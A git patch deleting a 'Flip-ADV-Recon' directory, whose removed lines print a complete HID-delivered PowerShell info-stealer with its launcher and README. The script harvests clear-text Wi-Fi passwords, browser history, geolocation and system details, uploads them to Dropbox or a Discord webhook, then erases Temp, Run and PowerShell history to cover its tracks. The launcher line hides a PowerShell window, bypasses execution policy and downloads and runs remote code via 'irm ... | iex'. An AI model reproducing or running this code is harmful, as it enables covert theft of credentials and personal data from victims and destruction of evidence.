From 7a3a6acbd4314f9992bd9189446c15ac45bfc8ce Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 25 Jul 2023 16:22:19 -0500 Subject: [PATCH] Delete Payloads/Flip-ADV-Recon directory --- Payloads/Flip-ADV-Recon/ADV-Recon.ps1 | 588 -------------------------- Payloads/Flip-ADV-Recon/ADV-Recon.txt | 12 - Payloads/Flip-ADV-Recon/README.md | 145 ------- 3 files changed, 745 deletions(-) delete mode 100644 Payloads/Flip-ADV-Recon/ADV-Recon.ps1 delete mode 100644 Payloads/Flip-ADV-Recon/ADV-Recon.txt delete mode 100644 Payloads/Flip-ADV-Recon/README.md diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 deleted file mode 100644 index 4743950..0000000 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 +++ /dev/null @@ -1,588 +0,0 @@ -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.SYNOPSIS - This is an advanced recon of a target PC and exfiltration of that data. -.DESCRIPTION - This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running. - All of the gather information is formatted neatly and output to a file. - That file is then exfiltrated to cloud storage via Dropbox. -.Link - https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads - https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads - https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads -#> - -############################################################################################################################################################ - -# MAKE LOOT FOLDER, FILE, and ZIP - -$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)" - -$FileName = "$FolderName.txt" - -$ZIP = "$FolderName.zip" - -New-Item -Path $env:tmp/$FolderName -ItemType Directory - -############################################################################################################################################################ - -# Enter your access tokens below. At least one has to be provided but both can be used at the same time. - -#$db = "" - -#$dc = "" - -############################################################################################################################################################ - -# Recon all User Directories -tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt - -# Powershell history -Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt - -############################################################################################################################################################ - -function Get-fullName { - - try { - $fullName = (Get-LocalUser -Name $env:USERNAME).FullName - } - - # If no name is detected function will return $env:UserName - - # Write Error is just for troubleshooting - catch {Write-Error "No name was detected" - return $env:UserName - -ErrorAction SilentlyContinue - } - - return $fullName - -} - -$fullName = Get-fullName - -#------------------------------------------------------------------------------------------------------------------------------------ - -function Get-email { - - try { - - $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName - return $email - } - -# If no email is detected function will return backup message for sapi speak - - # Write Error is just for troubleshooting - catch {Write-Error "An email was not found" - return "No Email Detected" - -ErrorAction SilentlyContinue - } -} - -$email = Get-email - - -#------------------------------------------------------------------------------------------------------------------------------------ - -function Get-GeoLocation{ - try { - Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace - $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object - $GeoWatcher.Start() #Begin resolving current locaton - - while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { - Start-Sleep -Milliseconds 100 #Wait for discovery. - } - - if ($GeoWatcher.Permission -eq 'Denied'){ - Write-Error 'Access Denied for Location Information' - } else { - $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. - } - } - # Write Error is just for troubleshooting - catch {Write-Error "No coordinates found" - return "No Coordinates found" - -ErrorAction SilentlyContinue - } - -} - -$GeoLocation = Get-GeoLocation - -$GeoLocation = $GeoLocation -split " " - -$Lat = $GeoLocation[0].Substring(11) -replace ".$" - -$Lon = $GeoLocation[1].Substring(10) -replace ".$" - -############################################################################################################################################################ - -# local-user - -$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String - -############################################################################################################################################################ - -Function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value } - -$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin" -$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop" - -$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name -$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name - -If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "Never notIfy" } - -ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "NotIfy me only when apps try to make changes to my computer(do not dim my desktop)" } - -ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "NotIfy me only when apps try to make changes to my computer(default)" } - -ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "Always notIfy" } - -Else{ $UAC = "Unknown" } - -############################################################################################################################################################ - -$lsass = Get-Process -Name "lsass" - -if ($lsass.ProtectedProcess) {$lsass = "LSASS is running as a protected process."} - -else {$lsass = "LSASS is not running as a protected process."} - -############################################################################################################################################################ - -$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath("Startup"))).Name - -############################################################################################################################################################ - -# Get nearby wifi networks - -try -{ -$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim() -} -catch -{ -$NearbyWifi="No nearby wifi networks detected" -} - -############################################################################################################################################################ - -# Get info about pc - -# Get IP / Network Info - -try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content} -catch{$computerPubIP="Error getting Public IP"} - -try{$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String} -catch{$localIP = "Error getting local IP"} - -$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String - -# Check RDP - -if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { - $RDP = "RDP is Enabled" -} else { - $RDP = "RDP is NOT enabled" -} - -############################################################################################################################################################ - -#Get System Info -$computerSystem = Get-CimInstance CIM_ComputerSystem - -$computerName = $computerSystem.Name - -$computerModel = $computerSystem.Model - -$computerManufacturer = $computerSystem.Manufacturer - -$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String - -$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String - -$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String - -$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String - -$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} | Out-String - -$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String - -############################################################################################################################################################ - -$ScheduledTasks = Get-ScheduledTask - -############################################################################################################################################################ - -$klist = klist sessions - -############################################################################################################################################################ - -$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime - -############################################################################################################################################################ - -# Get HDDs -$driveType = @{ - 2="Removable disk " - 3="Fixed local disk " - 4="Network disk " - 5="Compact disk "} -$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } | Out-String - -#Get - Com & Serial Devices -$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250 - -############################################################################################################################################################ - -# Get Network Interfaces -$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250 - -$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String - -############################################################################################################################################################ - -# process first -$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250 - -# Get Listeners / ActiveTcpConnections -$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess -$listener = $listener | foreach-object { - $listenerItem = $_ - $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess }) - new-object PSObject -property @{ - "LocalAddress" = $listenerItem.LocalAddress - "RemoteAddress" = $listenerItem.RemoteAddress - "State" = $listenerItem.State - "AppliedSetting" = $listenerItem.AppliedSetting - "OwningProcess" = $listenerItem.OwningProcess - "ProcessName" = $processItem.ProcessName - } -} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250 - -# service -$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250 - -# installed software (get uninstaller) -$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250 - -# drivers -$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250 - -# videocard -$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250 - - -############################################################################################################################################################ - -# OUTPUTS RESULTS TO LOOT FILE - -$output = @" - -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _' | | '_ ' _ \ _ | | / _' | | |/ / / _ \ | '_ \ | | | |# 'Y8888888Y' # -# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# 'Y888Y' # -# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# 'Y' # -# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| ('\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(' ') ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - - -Full Name: $fullName - -Email: $email - -GeoLocation: -Latitude: $Lat -Longitude: $Lon - ------------------------------------------------------------------------------------------------------------------------------- - -Local Users: -$luser - ------------------------------------------------------------------------------------------------------------------------------- - -UAC State: -$UAC - -LSASS State: -$lsass - -RDP State: -$RDP - ------------------------------------------------------------------------------------------------------------------------------- - -Public IP: -$computerPubIP - -Local IPs: -$localIP - -MAC: -$MAC - ------------------------------------------------------------------------------------------------------------------------------- - -Computer Name: -$computerName - -Model: -$computerModel - -Manufacturer: -$computerManufacturer - -BIOS: -$computerBIOS - -OS: -$computerOs - -CPU: -$computerCpu - -Mainboard: -$computerMainboard - -Ram Capacity: -$computerRamCapacity - -Total installed Ram: -$computerRam - -Video Card: -$videocard - ------------------------------------------------------------------------------------------------------------------------------- - -Contents of Start Up Folder: -$StartUp - ------------------------------------------------------------------------------------------------------------------------------- - -Scheduled Tasks: -$ScheduledTasks - ------------------------------------------------------------------------------------------------------------------------------- - -Logon Sessions: -$klist - ------------------------------------------------------------------------------------------------------------------------------- - -Recent Files: -$RecentFiles - ------------------------------------------------------------------------------------------------------------------------------- - -Hard-Drives: -$Hdds - -COM Devices: -$COMDevices - ------------------------------------------------------------------------------------------------------------------------------- - -Network Adapters: -$NetworkAdapters - ------------------------------------------------------------------------------------------------------------------------------- - -Nearby Wifi: -$NearbyWifi - -Wifi Profiles: -$wifiProfiles - ------------------------------------------------------------------------------------------------------------------------------- - -Process: -$process - ------------------------------------------------------------------------------------------------------------------------------- - -Listeners: -$listener - ------------------------------------------------------------------------------------------------------------------------------- - -Services: -$service - ------------------------------------------------------------------------------------------------------------------------------- - -Installed Software: -$software - ------------------------------------------------------------------------------------------------------------------------------- - -Drivers: -$drivers - ------------------------------------------------------------------------------------------------------------------------------- - -"@ - -$output > $env:TEMP\$FolderName/computerData.txt - -############################################################################################################################################################ - -function Get-BrowserData { - - [CmdletBinding()] - param ( - [Parameter (Position=1,Mandatory = $True)] - [string]$Browser, - [Parameter (Position=1,Mandatory = $True)] - [string]$DataType - ) - - $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' - - if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"} - elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"} - elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"} - elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"} - elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"} - - - $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique - $Value | ForEach-Object { - $Key = $_ - if ($Key -match $Search){ - New-Object -TypeName PSObject -Property @{ - User = $env:UserName - Browser = $Browser - DataType = $DataType - Data = $_ - } - } - } -} - -Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt - -Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt - -Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt - -Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt - -Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt - -############################################################################################################################################################ - -Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP - -# Upload output file to dropbox - -function dropbox { -$TargetFilePath="/$ZIP" -$SourceFilePath="$env:TEMP\$ZIP" -$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' -$authorization = "Bearer " + $db -$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" -$headers.Add("Authorization", $authorization) -$headers.Add("Dropbox-API-Arg", $arg) -$headers.Add("Content-Type", 'application/octet-stream') -Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers -} - -if (-not ([string]::IsNullOrEmpty($db))){dropbox} - -############################################################################################################################################################ - -function Upload-Discord { - -[CmdletBinding()] -param ( - [parameter(Position=0,Mandatory=$False)] - [string]$file, - [parameter(Position=1,Mandatory=$False)] - [string]$text -) - -$hookurl = "$dc" - -$Body = @{ - 'username' = $env:username - 'content' = $text -} - -if (-not ([string]::IsNullOrEmpty($text))){ -Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; - -if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} -} - -if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"} - - - -############################################################################################################################################################ - -<# -.NOTES - This is to clean up behind you and remove any evidence to prove you were there -#> - -# Delete contents of Temp folder - -rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue - -# Delete run box history - -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f - -# Delete powershell history - -Remove-Item (Get-PSreadlineOption).HistorySavePath - -# Deletes contents of recycle bin - -Clear-RecycleBin -Force -ErrorAction SilentlyContinue - - -############################################################################################################################################################ - -# Popup message to signal the payload is done - -$done = New-Object -ComObject Wscript.Shell;$done.Popup("Update Completed",1) diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.txt b/Payloads/Flip-ADV-Recon/ADV-Recon.txt deleted file mode 100644 index 932c2f6..0000000 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.txt +++ /dev/null @@ -1,12 +0,0 @@ -REM Title: ADV-Recon - -REM Author: I am Jakoby - -REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details. - -REM Target: Windows 10, 11 - -GUI r -DELAY 500 -STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex -ENTER diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md deleted file mode 100644 index 46385f3..0000000 --- a/Payloads/Flip-ADV-Recon/README.md +++ /dev/null @@ -1,145 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
    2. -
  2. Getting Started
    3. -
  3. Contributing
    4. -
  4. Version History
    5. -
  5. Contact
    6. -
  6. Acknowledgments
    7. -
-
- -# ADV-Recon - -A script used to do an advanced level of recon on the target's computer. - -Version 2 no longer requires you to host your own version of the script. - -Modifying the execution script is the only necessary interaction. - -## Description - -This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes: - -* Hosts PowerShell Version (to know what commands can be run) -* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected) -* Whether they are in the Admin group or not -* The email associated with their Microsoft account (for phishing possibilities) -* Other User accounts on their system (for possible privilege escalation) -* Details on their login settings (Ex: Min/Max password age and length) -* How many days since they have changed their password (Max password age - Days since = Opportunity) -* Their GeoLocation (know their approximate where abouts) -* Nearby Wifi Networks (Possible lateral movement) -* Network Info (Local and Public IP Address; MAC Address; RDP Enabled?) -* WLAN Profiles (List of SSIDs and Passwords stored on their PC) -* Network Interfaces (What are they connecting in and out with) -* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS) -* Local Users (Accounts on system with Username, name associated with microsoft account and SID) -* Information on their hard drives (Indicator of Recon Scope) -* COM and Serial Devices (Is there a device connected you can manipulate?) -* Active TCP Connections (Poor mans Port Scanning) -* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?) -* Video Card info (how much vroom vroom?) -* Tree Command (Gain a more accurate assessment of what to exfil or use in Phishing attacks) - -## Getting Started - -### Dependencies - -* Dropbox or Discord -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory - -`$dc` is the variable that stores your discord webhook - -`$db` is the variable that stores your dropbox token - -Fill in either or both of these two methods to exfil your collected data - -``` -powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -* 0.2 - * Added additional data queries - * Optimized output of data - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube - 		- - Python - -
Twitter - 		- - Golang - -
Instagram - 		- - Jsonnet - -
Discord - 		- - Jsonnet - -
TikTok -
-
- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)